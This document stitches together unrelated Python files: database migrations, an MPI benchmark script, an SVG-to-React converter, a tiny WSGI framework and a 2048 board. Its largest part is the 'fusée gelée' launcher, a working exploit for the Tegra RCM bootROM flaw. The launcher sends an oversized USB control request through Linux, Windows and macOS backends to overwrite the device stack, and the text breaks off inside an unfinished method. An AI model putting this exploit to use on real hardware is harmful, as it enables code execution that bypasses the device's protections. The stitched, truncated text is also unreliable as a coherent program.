    sa.Column('tag_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
    sa.ForeignKeyConstraint(['tag_id'], ['tag.id'], )
    )
    # ### end Alembic commands ###
def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Tables are dropped in reverse creation order so that foreign-key
    # constraints never reference a missing table.
    op.drop_table('post_tags')
    op.drop_table('post_goods')
    op.drop_table('post_child')
    op.drop_table('comment')
    op.drop_table('profile')
    op.drop_table('post')
    op.drop_table('followers')
    op.drop_table('user')
    op.drop_table('tag')
    op.drop_table('category')
    # ### end Alembic commands ###
|
import os

# Cleaning up data files from previous runs.
for fname in ("data1.txt", "data2.txt", "data3.txt"):
    if os.path.isfile(fname):
        os.remove(fname)

# Finding all the available hosts.
cmd = os.popen('bash checkhosts.sh')
print(cmd.read())
cmd.close()

# Data sizes to benchmark.
arr = [8192, 32768, 65536, 262144, 524288]


def _run_config(np_, ppn, mode):
    """Run every data size 10 times for one (-np, -ppn) configuration."""
    for size in arr:
        for _ in range(10):
            # Same command string the original duplicated loops produced.
            proc = os.popen('mpiexec -np %d -ppn %d -f hosts ./main.out %d %d'
                            % (np_, ppn, size, mode))
            print(proc.read())
            proc.close()


# Refactor: the original file repeated this loop body nine times.
# Order preserved: P=8 (arg 1), P=16 (arg 2), P=32 (arg 3),
# each at ppn 2, then 4, then 8.
for np_, mode in ((8, 1), (16, 2), (32, 3)):
    for ppn in (2, 4, 8):
        _run_config(np_, ppn, mode)

# uncommnent the below part if matplot lib and all other libs are installed
# os.system('python3 plot.py')
import time
# Console banner.
print('''
-----------------------------------------------------------------------
 Project available in the cesarzxk/svg-react-native-converter repository
-----------------------------------------------------------------------
''')
looping = True
# Main REPL loop: convert one SVG file per iteration until the user quits.
while(looping):
    name = input('Entre com o nome do arquivo svg: ').strip()
    filename = name + '.svg'
    destiny = input('Entre com o nome do arquivo de saida com extensão (ex: arquivo.js): ')
    imports = []
    try:
        with open(filename, 'r') as svg:
            # First pass: collect the capitalized tag names to import from
            # react-native-svg. NOTE(review): the bare excepts below are used
            # as control flow for lines without ' ' or '/'.
            for i in svg:
                try:
                    index = i.index(' ')
                    newi = i[1:index].capitalize()
                    imports.append(newi)
                except:
                    try:
                        index = i.index('/')
                    except:
                        newi = i[1:len(i)-2].capitalize()
                        imports.append(newi)
            # 'Svg' itself is imported separately, not in the braces list.
            if imports[0]=='Svg':
                imports.pop(0)
            svg.seek(0)
            newimports = ''
            # Deduplicate, then build the comma-separated import list.
            imports = list(set(imports))
            for i in imports:
                if (i == imports[len(imports)-1]):
                    newimports = newimports + i
                else:
                    newimports = newimports + i + ','
            # Second pass: emit the React component, capitalizing each tag.
            with open(destiny, 'w') as destiny:
                destiny.write("import React from 'react';\n")
                destiny.write("import Svg,{"+newimports+"}from 'react-native-svg';\n")
                destiny.write("\n")
                destiny.write("export default function "+ name.capitalize() + "(){\n\n")
                destiny.write("return(\n")
                for i in svg:
                    if(i[1] == "/"):
                        newi = i[2:].capitalize()
                        destiny.write('</'+newi)
                    else:
                        newi = i[1:].capitalize()
                        destiny.write('<'+newi)
                destiny.write("\n)}")
            print('''
            ------------------------Sucesso------------------------
            <>----------arquivo convertido com sucesso----------</>
            -------------------------------------------------------
            ''')
            # Ask whether to convert another file.
            restart = True
            while(restart):
                response = input('Deseja continuar convertendo?(n/s): ').lower()
                if(response == 'n'):
                    print('''
                    |------------------------------------------------------|
                    |-----------------Thanks for using!:D------------------|
                    |------------------------------------------------------|
                    ''')
                    time.sleep(3)
                    restart = False
                    looping = False
                elif(response == 's'):
                    restart = False
    except:
        # Reached when the input SVG cannot be opened (file not found).
        print('''
        -------------------------Erro!-------------------------
        <>--------------arquivo não encontrado--------------</>
        -------------------------------------------------------
        ''')
|
'''
1) Copy this file to config.py.
2) Set Wunderground API key here. https://www.wunderground.com/weather/api
'''
# Placeholder value -- replace with your real Wunderground API key.
WUAPI = '12345abc'
|
from webob import Request, Response, exc
from webob.dec import wsgify
import re
class DictObj:
    """Read-only attribute-style view over a dict (d.key instead of d['key'])."""

    def __init__(self, d: dict):
        # Write through __dict__ directly because __setattr__ is disabled.
        # Non-dict input degrades to an empty mapping rather than failing.
        if not isinstance(d, dict):
            self.__dict__['_dict'] = {}
        else:
            self.__dict__['_dict'] = d

    def __getattr__(self, item):
        try:
            return self._dict[item]
        except KeyError:
            # Typo fix: message used to read "not fount".
            raise AttributeError('Attribute {} not found'.format(item))

    def __setattr__(self, key, value):
        # Attribute assignment is deliberately forbidden; the view is read-only.
        raise NotImplementedError
# Dict subclass whose keys are also reachable as attributes (ctx.key).
class Context(dict):
    """Shared context object: dict with attribute-style read/write access."""

    def __getattr__(self, item):
        try:
            return self[item]
        except KeyError:
            # Typo fix: message used to read "not fount".
            raise AttributeError('Attribute {} not found'.format(item))

    def __setattr__(self, key, value):
        self[key] = value
class NestedContext(Context):
    """Context that falls back to a global context for keys it lacks."""

    def __init__(self, globalcontext: Context=None):
        super().__init__()
        self.relate(globalcontext)

    def relate(self, globalcontext: Context=None):
        """(Re)bind the global context used for fallback lookups."""
        self.globalcontext = globalcontext

    def __getattr__(self, item):
        # Local keys win; everything else is delegated to the global context.
        return self[item] if item in self.keys() else self.globalcontext[item]
class _Router:
    # Regex fragment used for each supported URL-segment type.
    TYPEPATTERNS = {
        'str': r'[^/]+', 'word': r'\w+', 'int': r'[-+]?\d+', 'float': r'[-+]?\d+\.\d+', 'any': r'.+'
    }
    # Conversion function applied to each captured segment.
    TYPECAST = {
        'str': str, 'word': str, 'int': int, 'float': float, 'any': str
    }
    # Matches one '/{name}' or '/{name:type}' placeholder in a route rule.
    KVPATTERN = re.compile(r'/({[^{}:]+:?[^{}:]*})')
    def _transform(self, kv: str):
        """Turn one '/{name:type}' placeholder into (regex fragment, name, cast)."""
        name, _, type = kv.strip('/{}').partition(':')
        return '/(?P<{}>{})'.format(name, self.TYPEPATTERNS.get(type, '\w+')), name, self.TYPECAST.get(type, str)
    def _parse(self, src: str):
        """Compile a route rule into a regex string plus a {name: cast} map."""
        start = 0
        res = ''
        translator = {}
        while True:
            matcher = self.KVPATTERN.search(src, start)
            if matcher:
                res += matcher.string[start:matcher.start()]
                tmp = self._transform(matcher.string[matcher.start():matcher.end()])
                res += tmp[0]
                translator[tmp[1]] = tmp[2]
                start = matcher.end()
            else:
                break
        if res:
            return res, translator
        else:
            return src, translator
    def __init__(self, prefix: str=''):
        self.__prefix = prefix.rstrip('/\\')
        self.__routetable = []
        # Router-local interceptors, run before/after every matched handler.
        self.pre_interceptor = []
        self.post_interceptor = []
        # Router-local context; linked to the global context on registration.
        self.ctx = NestedContext()
    def register_preinterceptor(self, fn):
        self.pre_interceptor.append(fn)
        return fn
    def register_postinterceptor(self, fn):
        self.post_interceptor.append(fn)
        return fn
    def route(self, rule, *methods):
        """Decorator: register a handler for *rule*; empty *methods* = any method."""
        def wrapper(handler):
            pattern, translator= self._parse(rule)
            self.__routetable.append((methods, re.compile(pattern), translator, handler))
            return handler
        return wrapper
    def get(self, pattern):
        return self.route(pattern, 'GET')
    def post(self, pattern):
        return self.route(pattern, 'POST')
    def head(self, pattern):
        return self.route(pattern, 'HEAD')
    def match(self, request: Request):
        # Prefix check: this router only serves paths under its one-level prefix.
        if not request.path.startswith(self.__prefix):
            return None
        # Run the router-local pre-interceptors in registration order.
        for fn in self.pre_interceptor:
            request = fn(self.ctx, request)
        for methods, pattern, translator, handler in self.__routetable:
            if not methods or request.method.upper() in methods:
                matcher = pattern.match(request.path.replace(self.__prefix, '', 1))
                if matcher:
                    # Cast each captured path variable and expose them on the request.
                    newdict = {}
                    for k,v in matcher.groupdict().items():
                        newdict[k] = translator[k](v)
                    request.vars = DictObj(newdict)
                    response = handler(self.ctx, request)
                    # Post-interceptors may replace or augment the response.
                    for fn in self.post_interceptor:
                        response = fn(self.ctx, request, response)
                    return response
    # Falls through and implicitly returns None when nothing matches.
class MagWeb:
    """WSGI application entry point: dispatches requests to registered routers."""
    # Expose the cooperating classes as class attributes of the framework.
    Router = _Router
    Request = Request
    Response = Response
    ctx = Context()  # global context object shared with every router

    def __init__(self, **kwargs):
        # Share framework-level information through the global context.
        self.ctx.app = self
        # Bug fix: iterating a dict yields keys only, so `for k, v in kwargs:`
        # raised ValueError (or silently mis-unpacked two-character keys).
        for k, v in kwargs.items():
            self.ctx[k] = v

    ROUTERS = []
    PRE_INTERCEPTOR = []
    POST_INTERCEPTOR = []

    # Global interceptor registration decorators.
    @classmethod
    def register_preinterceptor(cls, fn):
        cls.PRE_INTERCEPTOR.append(fn)
        return fn

    @classmethod
    def register_postinterceptor(cls, fn):
        cls.POST_INTERCEPTOR.append(fn)
        return fn

    @classmethod
    def register(cls, router :_Router):
        """Attach a router, linking its local context to the global one."""
        router.ctx.relate(cls.ctx)
        router.ctx.router = router
        cls.ROUTERS.append(router)

    @wsgify
    def __call__(self, request: Request):
        # Global pre-interceptors run before any routing.
        for fn in self.PRE_INTERCEPTOR:
            request = fn(self.ctx, request)
        # Ask each router in registration order; first truthy response wins.
        for router in self.ROUTERS:
            response = router.match(request)
            for fn in self.POST_INTERCEPTOR:
                response = fn(self.ctx, request, response)
            if response:
                return response
        raise exc.HTTPNotFound('Not found')

    @classmethod
    def extend(cls, name, ext):
        cls.ctx[name] = ext
|
import random
# NOTE: Python 2 module (print statements below); it will not run on Python 3.
class Board(object):
    """ Returns a new partially-empty board for 2048.
    Contains number 2 generated at random place in the board
    """
    # Grid dimensions; name-mangled to _Board__row / _Board__column.
    __row = 4
    __column = 4
    def __init__(self):
        # Created lazily by get_new_board().
        self.__board = None
    def get_new_board(self):
        # Build a row x column grid of zeros with a single 2 at a random cell.
        self.__board = [[0 for _ in range(Board.__column)] for _ in range(Board.__row)]
        random_row = random.randint(0, Board.__row-1)
        random_column = random.randint(0, Board.__column-1)
        self.__board[random_row][random_column] = 2
        return self.__board
    def draw(self):
        # Print the grid row by row (trailing comma keeps cells on one line).
        print "Board: "
        for i in range(Board.__row):
            for j in range(Board.__column):
                print self.__board[i][j],
            print
if __name__ == "__main__":
    board = Board()
    board.get_new_board()
    board.draw()
|
# Generated by Django 3.1.2 on 2020-10-19 22:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Initial migration for the filesystem app: Startdir (scan roots) and
    # File (entries discovered under a Startdir).
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Startdir',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('root_path', models.CharField(default='.', max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='File',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('file_type', models.CharField(max_length=18)),
                ('file_path', models.CharField(max_length=255)),
                # Deleting a Startdir cascades to the files found under it.
                ('relative_to_startdir', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='filesystem.startdir')),
            ],
        ),
    ]
|
#!/usr/bin/env python3
#
# fusée gelée
#
# Launcher for the {re}switched coldboot/bootrom hacks--
# launches payloads above the Horizon
#
# discovery and implementation by @ktemkin
# likely independently discovered by lots of others <3
#
# this code is political -- it stands with those who fight for LGBT rights
# don't like it? suck it up, or find your own damned exploit ^-^
#
# special thanks to:
# ScirèsM, motezazer -- guidance and support
# hedgeberg, andeor -- dumping the Jetson bootROM
# TuxSH -- for IDB notes that were nice to peek at
#
# much love to:
# Aurora Wright, Qyriad, f916253, MassExplosion213, and Levi
#
# greetings to:
# shuffle2
# This file is part of Fusée Launcher
# Copyright (C) 2018 Mikaela Szekely <qyriad@gmail.com>
# Copyright (C) 2018 Kate Temkin <k@ktemkin.com>
# Fusée Launcher is licensed under the terms of the GNU GPLv2
import os
import sys
import errno
import ctypes
import argparse
import platform
import binascii
import struct
# Maximum size of a single USB transfer to the device.
USB_XFER_MAX = 0x1000
# RCM command-header sizes for the different bootROM protocol versions
# (exact SoC-to-version mapping not established here -- see Tegra RCM notes).
RCM_V1_HEADER_SIZE = 116
RCM_V35_HEADER_SIZE = 628
RCM_V40_HEADER_SIZE = 644
RCM_V4P_HEADER_SIZE = 680
# The address where the RCM payload is placed.
# This is fixed for most device.
RCM_PAYLOAD_ADDR = 0x4000A000
# The address where the user payload is expected to begin.
PAYLOAD_START_ADDR = 0x4000AE40
# Specify the range of addresses where we should inject our
# payload address.
STACK_SPRAY_START = 0x4000EE40
STACK_SPRAY_END = 0x40011000
class RCMError(Exception):
    """Raised when the device reports an RCM protocol error code."""

    def __init__(self, rcm_error_code):
        # Keep the raw code available to callers while formatting the message.
        super().__init__("RCM error 0x{:08x}".format(rcm_error_code))
        self.rcm_error_code = rcm_error_code
# notes:
# GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
# GET_INTERFACE to the INTERFACE triggers memcpy from 0x40003984
# GET_STATUS to the ENDPOINT triggers memcpy from <on the stack>
class HaxBackend:
    """
    Base class for backends for the TegraRCM vuln.
    """
    # USB constants used
    STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT = 0x82
    STANDARD_REQUEST_DEVICE_TO_HOST = 0x80
    GET_DESCRIPTOR = 0x6
    GET_CONFIGURATION = 0x8
    # Interface requests
    GET_STATUS = 0x0
    # List of OSs this class supports.
    SUPPORTED_SYSTEMS = []
    def __init__(self, skip_checks=False):
        """ Sets up the backend for the given device. """
        self.skip_checks = skip_checks
    def print_warnings(self):
        """ Print any warnings necessary for the given backend. """
        pass
    def trigger_vulnerability(self, length):
        """
        Triggers the actual controlled memcpy.
        The actual trigger needs to be executed carefully, as different host OSs
        require us to ask for our invalid control request differently.
        """
        raise NotImplementedError("Trying to use an abstract backend rather than an instance of the proper subclass!")
    @classmethod
    def supported(cls, system_override=None):
        """ Returns true iff the given backend is supported on this platform. """
        # If we have a SYSTEM_OVERRIDE, use it.
        if system_override:
            system = system_override
        else:
            system = platform.system()
        return system in cls.SUPPORTED_SYSTEMS
    @classmethod
    def create_appropriate_backend(cls, system_override=None, skip_checks=False):
        """ Creates a backend object appropriate for the current OS. """
        # Search for a supportive backend, and try to create one.
        for subclass in cls.__subclasses__():
            if subclass.supported(system_override):
                return subclass(skip_checks=skip_checks)
        # ... if we couldn't, bail out.
        raise IOError("No backend to trigger the vulnerability-- it's likely we don't support your OS!")
    def read(self, length):
        """ Reads data from the RCM protocol endpoint. """
        # Endpoint 0x81 (IN), 3000 ms timeout.
        return bytes(self.dev.read(0x81, length, 3000))
    def read_ep0(self, length):
        # Issue a GET_STATUS control read of the given length on endpoint 0.
        return bytes(self.dev.ctrl_transfer(self.STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT, self.GET_STATUS, 0, 0, length))
    def write_single_buffer(self, data):
        """
        Writes a single RCM buffer, which should be USB_XFER_MAX long.
        The last packet may be shorter, and should trigger a ZLP (e.g. not divisible by 512).
        If it's not, send a ZLP.
        """
        # Endpoint 0x01 (OUT), 3000 ms timeout.
        return self.dev.write(0x01, data, 3000)
    def find_device(self, vid=None, pid=None):
        """ Set and return the device to be used """
        # Side effect: forces pyusb logging to 'info' for all later USB calls.
        # os.environ['PYUSB_DEBUG'] = 'debug'
        os.environ['PYUSB_DEBUG'] = 'info'
        import usb
        self.dev = usb.core.find(idVendor=vid, idProduct=pid)
        return self.dev
class MacOSBackend(HaxBackend):
    """
    Simple vulnerability trigger for macOS: we simply ask libusb to issue
    the broken control request, and it'll do it for us. :)

    We also support platforms with a hacked libusb and FreeBSD.
    """

    BACKEND_NAME = "macOS"
    SUPPORTED_SYSTEMS = ['Darwin', 'libusbhax', 'macos', 'FreeBSD']

    def trigger_vulnerability(self, length):
        # On these platforms libusb forwards the oversized GET_STATUS request
        # unmodified, so a plain control transfer is the whole trigger.
        response = self.dev.ctrl_transfer(self.STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT, self.GET_STATUS, 0, 0, length)
        return bytes(response)
class LinuxBackend(HaxBackend):
    """
    More complex vulnerability trigger for Linux: we can't go through libusb,
    as it limits control requests to a single page size, the limitation expressed
    by the usbfs. More realistically, the usbfs seems fine with it, and we just
    need to work around libusb.
    """

    BACKEND_NAME = "Linux"
    SUPPORTED_SYSTEMS = ['Linux', 'linux']

    # Sysfs driver directories whose host controllers are known to deliver
    # the oversized control request intact.
    SUPPORTED_USB_CONTROLLERS = ['pci/drivers/xhci_hcd', 'platform/drivers/dwc_otg']

    # A USB control setup packet is always eight bytes long.
    SETUP_PACKET_SIZE = 8

    # Pieces used to hand-build the usbfs submit-URB ioctl request number.
    IOCTL_IOR = 0x80000000
    IOCTL_TYPE = ord('U')
    IOCTL_NR_SUBMIT_URB = 10

    # usbfs URB type for a control transfer.
    URB_CONTROL_REQUEST = 2

    class SubmitURBIoctl(ctypes.Structure):
        # Mirrors the kernel's usbdevfs URB structure so we can submit it
        # directly via ioctl().
        _fields_ = [
            ('type', ctypes.c_ubyte),
            ('endpoint', ctypes.c_ubyte),
            ('status', ctypes.c_int),
            ('flags', ctypes.c_uint),
            ('buffer', ctypes.c_void_p),
            ('buffer_length', ctypes.c_int),
            ('actual_length', ctypes.c_int),
            ('start_frame', ctypes.c_int),
            ('stream_id', ctypes.c_uint),
            ('error_count', ctypes.c_int),
            ('signr', ctypes.c_uint),
            ('usercontext', ctypes.c_void_p),
        ]

    def print_warnings(self):
        """ Print any warnings necessary for the given backend. """
        print("\nImportant note: on desktop Linux systems, we currently require an XHCI host controller.")
        print("A good way to ensure you're likely using an XHCI backend is to plug your")
        print("device into a blue 'USB 3' port.\n")

    def trigger_vulnerability(self, length):
        """
        Submit the control request directly using the USBFS submit_urb
        ioctl, which issues the control request directly. This allows us
        to send our giant control request despite size limitations.
        """

        import os
        import fcntl

        # We only work for devices that are bound to a compatible HCD.
        self._validate_environment()

        # Figure out the USB device file we're going to use to issue the
        # control request.
        fd = os.open('/dev/bus/usb/{:0>3d}/{:0>3d}'.format(self.dev.bus, self.dev.address), os.O_RDWR)

        # Define the setup packet to be submitted:
        # bmRequestType, bRequest, wValue, wIndex, then the oversized wLength
        # that makes the device's memcpy run far past the real buffer.
        setup_packet = \
            int.to_bytes(self.STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT, 1, byteorder='little') + \
            int.to_bytes(self.GET_STATUS, 1, byteorder='little') + \
            int.to_bytes(0, 2, byteorder='little') + \
            int.to_bytes(0, 2, byteorder='little') + \
            int.to_bytes(length, 2, byteorder='little')

        # Create a buffer to hold the result.
        buffer_size = self.SETUP_PACKET_SIZE + length
        buffer = ctypes.create_string_buffer(setup_packet, buffer_size)

        # Define the data structure used to issue the control request URB.
        request = self.SubmitURBIoctl()
        request.type = self.URB_CONTROL_REQUEST
        request.endpoint = 0
        request.buffer = ctypes.addressof(buffer)
        request.buffer_length = buffer_size

        # Manually submit an URB to the kernel, so it issues our 'evil' control request.
        # FIX: use the IOCTL_TYPE class constant instead of a second ord('U')
        # literal, so the ioctl 'type' byte is defined in exactly one place.
        ioctl_number = (self.IOCTL_IOR | ctypes.sizeof(request) << 16 | self.IOCTL_TYPE << 8 | self.IOCTL_NR_SUBMIT_URB)
        fcntl.ioctl(fd, ioctl_number, request, True)

        # Close our newly created fd.
        os.close(fd)

        # The other modules raise an IOError when the control request fails to complete. We don't fail out (as we don't bother
        # reading back), so we'll simulate the same behavior as the others.
        raise IOError("Raising an error to match the others!")

    def _validate_environment(self):
        """
        We can only inject giant control requests on devices that are backed
        by certain usb controllers-- typically, the xhci_hcd on most PCs.
        """

        from glob import glob

        # If we're overriding checks, never fail out.
        if self.skip_checks:
            print("skipping checks")
            return

        # Search each device bound to the xhci_hcd driver for the active device...
        for hci_name in self.SUPPORTED_USB_CONTROLLERS:
            for path in glob("/sys/bus/{}/*/usb*".format(hci_name)):
                if self._node_matches_our_device(path):
                    return

        raise ValueError("This device needs to be on a supported backend. Usually that means plugged into a blue/USB 3.0 port!\nBailing out.")

    def _node_matches_our_device(self, path):
        """
        Checks to see if the given sysfs node matches our given device.
        Can be used to check if an xhci_hcd controller subnode reflects a given device.
        """

        # If this isn't a valid USB device node, it's not what we're looking for.
        if not os.path.isfile(path + "/busnum"):
            return False

        # We assume that a whole _bus_ is associated with a host controller driver, so we
        # only check for a matching bus ID.
        if self.dev.bus != self._read_num_file(path + "/busnum"):
            return False

        # If all of our checks passed, this is our device.
        return True

    def _read_num_file(self, path):
        """
        Reads a numeric value from a sysfs file that contains only a number.
        """
        with open(path, 'r') as f:
            raw = f.read()
            return int(raw)
class WindowsBackend(HaxBackend):
    """
    Use libusbK for most of it, and use the handle libusbK gets for us to call kernel32's DeviceIoControl
    """

    BACKEND_NAME = "Windows"
    SUPPORTED_SYSTEMS = ["Windows"]

    # Windows and libusbK specific constants
    WINDOWS_FILE_DEVICE_UNKNOWN = 0x00000022
    LIBUSBK_FUNCTION_CODE_GET_STATUS = 0x807
    WINDOWS_METHOD_BUFFERED = 0
    WINDOWS_FILE_ANY_ACCESS = 0
    RAW_REQUEST_STRUCT_SIZE = 24 # 24 is how big the struct is, just trust me
    TO_ENDPOINT = 2

    # Yoinked (with love) from Windows' CTL_CODE macro
    def win_ctrl_code(self, DeviceType, Function, Method, Access):
        """ Return a control code for use with DeviceIoControl() """
        return ((DeviceType) << 16 | ((Access) << 14) | ((Function)) << 2 | (Method))

    def __init__(self, skip_checks):
        # FIX: run the base-class initializer so self.skip_checks is set,
        # matching every other backend's behavior.
        super().__init__(skip_checks=skip_checks)
        import libusbK
        self.libk = libusbK

        # Grab libusbK
        self.lib = ctypes.cdll.libusbK

    def find_device(self, Vid, Pid):
        """
        Windows version of this function
        Its return isn't actually significant, but it needs to be not None
        """

        # Get a list of devices to use later
        device_list = self.libk.KLST_HANDLE()
        device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
        ret = self.lib.LstK_Init(ctypes.byref(device_list), 0)
        if ret == 0:
            raise ctypes.WinError()

        # Get info for a device with that vendor ID and product ID
        device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
        ret = self.lib.LstK_FindByVidPid(device_list, Vid, Pid, ctypes.byref(device_info))
        self.lib.LstK_Free(ctypes.byref(device_list))
        if device_info is None or ret == 0:
            return None

        # Populate function pointers for use with the driver our device uses (which should be libusbK)
        self.dev = self.libk.KUSB_DRIVER_API()
        ret = self.lib.LibK_LoadDriverAPI(ctypes.byref(self.dev), device_info.contents.DriverID)
        if ret == 0:
            raise ctypes.WinError()

        # Initialize the driver for use with our device
        self.handle = self.libk.KUSB_HANDLE(None)
        ret = self.dev.Init(ctypes.byref(self.handle), device_info)
        if ret == 0:
            # FIX: raise ctypes.WinError() like every other failure path in
            # this class; self.libk.WinError() referenced a name the libusbK
            # wrapper is not shown to provide.
            raise ctypes.WinError()

        return self.dev

    def read(self, length):
        """ Read using libusbK """
        # Create the buffer to store what we read
        buffer = ctypes.create_string_buffer(length)

        len_transferred = ctypes.c_uint(0)

        # Call libusbK's ReadPipe using our specially-crafted function pointer and the opaque device handle
        ret = self.dev.ReadPipe(self.handle, ctypes.c_ubyte(0x81), ctypes.addressof(buffer), ctypes.c_uint(length), ctypes.byref(len_transferred), None)

        if ret == 0:
            raise ctypes.WinError()

        return buffer.raw

    def write_single_buffer(self, data):
        """ Write using libusbK """
        # Copy construct to a bytearray so we Know™ what type it is
        buffer = bytearray(data)

        # Convert wrap the data for use with ctypes
        cbuffer = (ctypes.c_ubyte * len(buffer))(*buffer)

        len_transferred = ctypes.c_uint(0)

        # Call libusbK's WritePipe using our specially-crafted function pointer and the opaque device handle
        ret = self.dev.WritePipe(self.handle, ctypes.c_ubyte(0x01), cbuffer, len(data), ctypes.byref(len_transferred), None)
        if ret == 0:
            raise ctypes.WinError()

    def ioctl(self, driver_handle: ctypes.c_void_p, ioctl_code: ctypes.c_ulong, input_bytes: ctypes.c_void_p, input_bytes_count: ctypes.c_size_t, output_bytes: ctypes.c_void_p, output_bytes_count: ctypes.c_size_t):
        """ Wrapper for DeviceIoControl; raises on failure, returns None. """
        overlapped = self.libk.OVERLAPPED()
        ctypes.memset(ctypes.addressof(overlapped), 0, ctypes.sizeof(overlapped))

        ret = ctypes.windll.kernel32.DeviceIoControl(driver_handle, ioctl_code, input_bytes, input_bytes_count, output_bytes, output_bytes_count, None, ctypes.byref(overlapped))

        # We expect this to error, which matches the others ^_^
        if ret == False:
            raise ctypes.WinError()

    def trigger_vulnerability(self, length):
        """
        Go over libusbK's head and get the master handle it's been using internally
        and perform a direct DeviceIoControl call to the kernel to skip the length check
        """

        # self.handle is KUSB_HANDLE, cast to KUSB_HANDLE_INTERNAL to transparent-ize it
        internal = ctypes.cast(self.handle, ctypes.POINTER(self.libk.KUSB_HANDLE_INTERNAL))

        # Get the handle libusbK has been secretly using in its ioctl calls this whole time
        master_handle = internal.contents.Device.contents.MasterDeviceHandle

        if master_handle is None or master_handle == self.libk.INVALID_HANDLE_VALUE:
            raise ValueError("Failed to initialize master handle")

        # the raw request struct is pretty annoying, so I'm just going to allocate enough memory and set the few fields I need
        raw_request = ctypes.create_string_buffer(self.RAW_REQUEST_STRUCT_SIZE)

        # set timeout to 1000 ms, timeout offset is 0 (since it's the first member), and it's an unsigned int
        timeout_p = ctypes.cast(raw_request, ctypes.POINTER(ctypes.c_uint))
        timeout_p.contents = ctypes.c_ulong(1000) # milliseconds

        # The status sub-struct starts at offset 4: set the request index and
        # aim the recipient at an endpoint, as the vulnerability requires.
        status_p = ctypes.cast(ctypes.byref(raw_request, 4), ctypes.POINTER(self.libk.status_t))
        status_p.contents.index = self.GET_STATUS
        status_p.contents.recipient = self.TO_ENDPOINT

        buffer = ctypes.create_string_buffer(length)

        code = self.win_ctrl_code(self.WINDOWS_FILE_DEVICE_UNKNOWN, self.LIBUSBK_FUNCTION_CODE_GET_STATUS, self.WINDOWS_METHOD_BUFFERED, self.WINDOWS_FILE_ANY_ACCESS)

        ret = self.ioctl(master_handle, ctypes.c_ulong(code), raw_request, ctypes.c_size_t(24), buffer, ctypes.c_size_t(length))
        # NOTE(review): self.ioctl() returns None and raises on failure, so
        # this check is vestigial; kept for parity with the original flow.
        if ret == False:
            raise ctypes.WinError()
class RCMHax:
    """
    Driver for the RCM connection and the stack-smash setup.

    Wraps a HaxBackend, tracks which of the device's two alternating DMA
    copy buffers is active, derives the stack-overwrite geometry from a
    leaked stack snapshot, and patches the intermezzo relocator to match.
    """

    # Default to the T30 RCM VID and PID.
    DEFAULT_VID = 0x0955
    DEFAULT_PID = 0x7330

    # Exploit specifics
    COPY_BUFFER_ADDRESSES = [0x40003000, 0x40005000]   # The addresses of the DMA buffers we can trigger a copy _from_.
    STACK_END = 0x4000A000                             # The address just after the end of the device's stack.

    def __init__(self, wait_for_device=False, os_override=None, vid=None, pid=None, override_checks=False):
        """ Set up our RCM hack connection."""

        # The first write into the bootROM touches the lowbuffer.
        self.current_buffer = 0

        # Keep track of the total amount written.
        self.total_written = 0

        # Create a vulnerability backend for the given device.
        try:
            self.backend = HaxBackend.create_appropriate_backend(system_override=os_override, skip_checks=override_checks)
        except IOError:
            print("It doesn't look like we support your OS, currently. Sorry about that!\n")
            sys.exit(-1)

        # Grab a connection to the USB device itself.
        self.dev = self._find_device(vid, pid)

        # Stack-geometry values, lazily computed by get_overwrite_length().
        self.overwrite_len = None
        self.EndpointStatus_stack_addr = None
        self.ProcessSetupPacket_SP = None
        self.InnerMemcpy_LR_stack_addr = None

        # If we don't have a device...
        if self.dev is None:

            # ... and we're allowed to wait for one, wait indefinitely for one to appear...
            if wait_for_device:
                print("Waiting for a TegraRCM device to come online...")
                while self.dev is None:
                    self.dev = self._find_device(vid, pid)

            # ... or bail out.
            else:
                raise IOError("No TegraRCM device found?")

        # Print any use-related warnings.
        self.backend.print_warnings()

        # Notify the user of which backend we're using.
        print("Identified a {} system; setting up the appropriate backend.".format(self.backend.BACKEND_NAME))

    def _find_device(self, vid=None, pid=None):
        """ Attempts to get a connection to the RCM device with the given VID and PID. """

        # Apply our default VID and PID if neither are provided...
        vid = vid if vid else self.DEFAULT_VID
        pid = pid if pid else self.DEFAULT_PID

        # ... and use them to find a USB device.
        return self.backend.find_device(vid, pid)

    def read(self, length):
        """ Reads data from the RCM protocol endpoint. """
        return self.backend.read(length)

    def write(self, data):
        """ Writes data to the main RCM protocol endpoint in USB_XFER_MAX-sized chunks. """

        length = len(data)
        print("txing {} bytes total".format(length))
        packet_size = USB_XFER_MAX

        length_sent = 0
        while length:
            data_to_transmit = min(length, packet_size)
            print("txing {} bytes ({} already sent) to buf[{}] 0x{:08x}".format(data_to_transmit, length_sent, self.current_buffer, self.get_current_buffer_address()))
            length -= data_to_transmit

            chunk = data[:data_to_transmit]
            data = data[data_to_transmit:]
            self.write_single_buffer(chunk)
            length_sent += data_to_transmit

    def write_single_buffer(self, data):
        """
        Writes a single RCM buffer, which should be USB_XFER_MAX long.
        The last packet may be shorter, and should trigger a ZLP (e.g. not divisible by 512).
        If it's not, send a ZLP.
        """
        self._toggle_buffer()
        try:
            return self.backend.write_single_buffer(data)
        except Exception as err:
            # A failed write usually means the device pushed back a 4-byte RCM
            # error word; read it and surface it as an RCMError.
            print("USBError: {}".format(err))
            rcm_err = self.read(4)
            # FIX: struct.unpack always returns a tuple. The previous code
            # handed the whole tuple to RCMError, whose "0x{:08x}" formatting
            # would then raise a TypeError instead of reporting the code.
            rcm_err_int = struct.unpack('>I', rcm_err)[0]
            raise RCMError(rcm_err_int)

    def _toggle_buffer(self):
        """
        Toggles the active target buffer, paralleling the operation happening in
        RCM on the X1 device.
        """
        self.current_buffer = 1 - self.current_buffer

    def get_current_buffer_address(self):
        """ Returns the base address for the current copy. """
